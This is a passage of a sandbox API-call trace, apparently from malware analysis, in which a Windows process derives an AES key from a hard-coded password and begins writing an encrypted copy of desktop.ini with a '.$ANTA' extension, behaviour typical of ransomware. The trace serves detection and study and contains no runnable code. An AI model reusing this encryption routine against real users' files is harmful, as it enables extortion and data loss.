hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0110.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0110.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0110.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0110.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9bc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0110.010] CloseHandle (hObject=0x258) returned 1 [0110.010] FreeLibrary (hLibModule=0x772d0000) returned 1 [0110.010] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0110.010] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac440 [0110.011] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0110.011] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0110.011] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0110.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.011] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0110.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0110.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0110.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796f08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0110.011] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0110.012] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0110.012] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0110.012] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0110.012] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0110.012] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.012] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0110.012] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.012] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0110.012] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0110.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca3d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0110.013] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0110.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0110.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0110.013] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0110.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0110.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0110.013] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.013] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0110.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca1f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0110.013] CryptHashData (hHash=0x41ac600, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0110.013] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.013] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0110.013] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0110.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca268, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0110.013] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac100) returned 1 [0110.013] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.013] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0110.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0110.014] CryptDestroyHash (hHash=0x41ac600) returned 1 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8cd8 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea490 [0110.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0110.015] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0110.015] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0110.015] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0110.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0110.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0110.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0110.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0110.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0110.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0110.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0110.015] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\music\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0110.015] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.015] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0110.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0110.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0110.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0110.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0110.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0110.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0110.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0110.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.016] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0110.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0110.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0110.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0110.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0110.016] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0110.016] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0110.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0110.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0110.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0110.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0110.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0110.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0110.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0110.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a298 [0110.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0110.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0110.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0110.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a298 | out: hHeap=0x1780000) returned 1 [0110.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0110.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0110.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0110.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0110.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0110.018] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0110.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0110.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0110.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0110.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0110.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0110.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.018] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\desktop.ini.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0110.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0110.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0110.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0110.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0110.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0110.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0110.019] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 